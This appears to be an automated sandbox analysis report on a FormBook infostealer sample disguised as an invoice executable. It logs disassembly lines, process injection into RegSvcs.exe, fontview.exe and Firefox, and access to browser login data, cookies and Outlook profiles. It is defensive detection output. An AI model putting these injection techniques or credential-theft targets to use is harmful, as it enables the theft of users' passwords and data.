            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014609AD mov eax, dword ptr fs:[00000030h]4_2_014609AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E89B3 mov esi, dword ptr fs:[00000030h]4_2_014E89B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E89B3 mov eax, dword ptr fs:[00000030h]4_2_014E89B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E89B3 mov eax, dword ptr fs:[00000030h]4_2_014E89B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01472840 mov ecx, dword ptr fs:[00000030h]4_2_01472840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01490854 mov eax, dword ptr fs:[00000030h]4_2_01490854
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01464859 mov eax, dword ptr fs:[00000030h]4_2_01464859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01464859 mov eax, dword ptr fs:[00000030h]4_2_01464859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EE872 mov eax, dword ptr fs:[00000030h]4_2_014EE872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EE872 mov eax, dword ptr fs:[00000030h]4_2_014EE872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F6870 mov eax, dword ptr fs:[00000030h]4_2_014F6870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F6870 mov eax, dword ptr fs:[00000030h]4_2_014F6870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EC810 mov eax, dword ptr fs:[00000030h]4_2_014EC810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150483A mov eax, dword ptr fs:[00000030h]4_2_0150483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150483A mov eax, dword ptr fs:[00000030h]4_2_0150483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A830 mov eax, dword ptr fs:[00000030h]4_2_0149A830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01482835 mov eax, dword ptr fs:[00000030h]4_2_01482835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01482835 mov eax, dword ptr fs:[00000030h]4_2_01482835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01482835 mov eax, dword ptr fs:[00000030h]4_2_01482835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01482835 mov ecx, dword ptr fs:[00000030h]4_2_01482835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01482835 mov eax, dword ptr fs:[00000030h]4_2_01482835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01482835 mov eax, dword ptr fs:[00000030h]4_2_01482835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E8C0 mov eax, dword ptr fs:[00000030h]4_2_0148E8C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015308C0 mov eax, dword ptr fs:[00000030h]4_2_015308C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C8F9 mov eax, dword ptr fs:[00000030h]4_2_0149C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C8F9 mov eax, dword ptr fs:[00000030h]4_2_0149C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152A8E4 mov eax, dword ptr fs:[00000030h]4_2_0152A8E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01460887 mov eax, dword ptr fs:[00000030h]4_2_01460887
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EC89D mov eax, dword ptr fs:[00000030h]4_2_014EC89D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150EB50 mov eax, dword ptr fs:[00000030h]4_2_0150EB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01532B57 mov eax, dword ptr fs:[00000030h]4_2_01532B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01532B57 mov eax, dword ptr fs:[00000030h]4_2_01532B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01532B57 mov eax, dword ptr fs:[00000030h]4_2_01532B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01532B57 mov eax, dword ptr fs:[00000030h]4_2_01532B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F6B40 mov eax, dword ptr fs:[00000030h]4_2_014F6B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F6B40 mov eax, dword ptr fs:[00000030h]4_2_014F6B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01508B42 mov eax, dword ptr fs:[00000030h]4_2_01508B42
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152AB40 mov eax, dword ptr fs:[00000030h]4_2_0152AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01458B50 mov eax, dword ptr fs:[00000030h]4_2_01458B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01514B4B mov eax, dword ptr fs:[00000030h]4_2_01514B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01514B4B mov eax, dword ptr fs:[00000030h]4_2_01514B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145CB7E mov eax, dword ptr fs:[00000030h]4_2_0145CB7E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DEB1D mov eax, dword ptr fs:[00000030h]4_2_014DEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DEB1D mov eax, dword ptr fs:[00000030h]4_2_014DEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DEB1D mov eax, dword ptr fs:[00000030h]4_2_014DEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DEB1D mov eax, dword ptr fs:[00000030h]4_2_014DEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DEB1D mov eax, dword ptr fs:[00000030h]4_2_014DEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DEB1D mov eax, dword ptr fs:[00000030h]4_2_014DEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DEB1D mov eax, dword ptr fs:[00000030h]4_2_014DEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DEB1D mov eax, dword ptr fs:[00000030h]4_2_014DEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DEB1D mov eax, dword ptr fs:[00000030h]4_2_014DEB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534B00 mov eax, dword ptr fs:[00000030h]4_2_01534B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148EB20 mov eax, dword ptr fs:[00000030h]4_2_0148EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148EB20 mov eax, dword ptr fs:[00000030h]4_2_0148EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01528B28 mov eax, dword ptr fs:[00000030h]4_2_01528B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01528B28 mov eax, dword ptr fs:[00000030h]4_2_01528B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150EBD0 mov eax, dword ptr fs:[00000030h]4_2_0150EBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01480BCB mov eax, dword ptr fs:[00000030h]4_2_01480BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01480BCB mov eax, dword ptr fs:[00000030h]4_2_01480BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01480BCB mov eax, dword ptr fs:[00000030h]4_2_01480BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01460BCD mov eax, dword ptr fs:[00000030h]4_2_01460BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01460BCD mov eax, dword ptr fs:[00000030h]4_2_01460BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01460BCD mov eax, dword ptr fs:[00000030h]4_2_01460BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148EBFC mov eax, dword ptr fs:[00000030h]4_2_0148EBFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01468BF0 mov eax, dword ptr fs:[00000030h]4_2_01468BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01468BF0 mov eax, dword ptr fs:[00000030h]4_2_01468BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01468BF0 mov eax, dword ptr fs:[00000030h]4_2_01468BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014ECBF0 mov eax, dword ptr fs:[00000030h]4_2_014ECBF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01514BB0 mov eax, dword ptr fs:[00000030h]4_2_01514BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01514BB0 mov eax, dword ptr fs:[00000030h]4_2_01514BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470BBE mov eax, dword ptr fs:[00000030h]4_2_01470BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470BBE mov eax, dword ptr fs:[00000030h]4_2_01470BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01466A50 mov eax, dword ptr fs:[00000030h]4_2_01466A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01466A50 mov eax, dword ptr fs:[00000030h]4_2_01466A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01466A50 mov eax, dword ptr fs:[00000030h]4_2_01466A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01466A50 mov eax, dword ptr fs:[00000030h]4_2_01466A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01466A50 mov eax, dword ptr fs:[00000030h]4_2_01466A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01466A50 mov eax, dword ptr fs:[00000030h]4_2_01466A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01466A50 mov eax, dword ptr fs:[00000030h]4_2_01466A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470A5B mov eax, dword ptr fs:[00000030h]4_2_01470A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470A5B mov eax, dword ptr fs:[00000030h]4_2_01470A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149CA6F mov eax, dword ptr fs:[00000030h]4_2_0149CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149CA6F mov eax, dword ptr fs:[00000030h]4_2_0149CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149CA6F mov eax, dword ptr fs:[00000030h]4_2_0149CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150EA60 mov eax, dword ptr fs:[00000030h]4_2_0150EA60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DCA72 mov eax, dword ptr fs:[00000030h]4_2_014DCA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DCA72 mov eax, dword ptr fs:[00000030h]4_2_014DCA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014ECA11 mov eax, dword ptr fs:[00000030h]4_2_014ECA11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148EA2E mov eax, dword ptr fs:[00000030h]4_2_0148EA2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149CA24 mov eax, dword ptr fs:[00000030h]4_2_0149CA24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149CA38 mov eax, dword ptr fs:[00000030h]4_2_0149CA38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01484A35 mov eax, dword ptr fs:[00000030h]4_2_01484A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01484A35 mov eax, dword ptr fs:[00000030h]4_2_01484A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014B6ACC mov eax, dword ptr fs:[00000030h]4_2_014B6ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014B6ACC mov eax, dword ptr fs:[00000030h]4_2_014B6ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014B6ACC mov eax, dword ptr fs:[00000030h]4_2_014B6ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01460AD0 mov eax, dword ptr fs:[00000030h]4_2_01460AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01494AD0 mov eax, dword ptr fs:[00000030h]4_2_01494AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01494AD0 mov eax, dword ptr fs:[00000030h]4_2_01494AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149AAEE mov eax, dword ptr fs:[00000030h]4_2_0149AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149AAEE mov eax, dword ptr fs:[00000030h]4_2_0149AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146EA80 mov eax, dword ptr fs:[00000030h]4_2_0146EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146EA80 mov eax, dword ptr fs:[00000030h]4_2_0146EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146EA80 mov eax, dword ptr fs:[00000030h]4_2_0146EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146EA80 mov eax, dword ptr fs:[00000030h]4_2_0146EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00417553 LdrLoadDll,4_2_00417553
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\fontview.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeSection loaded: unknown target: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeSection loaded: unknown target: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BB6008Jump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000Jump to behavior
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\fontview.exeThread APC queued: target process: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exeJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exeProcess created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SysWOW64\fontview.exeJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000000.1274059645.0000000000E70000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3735189072.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406462799.00000000016C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000000.1274059645.0000000000E70000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3735189072.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406462799.00000000016C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000000.1274059645.0000000000E70000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3735189072.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406462799.00000000016C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000000.1274059645.0000000000E70000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3735189072.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406462799.00000000016C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeQueries volume information: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\fontview.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
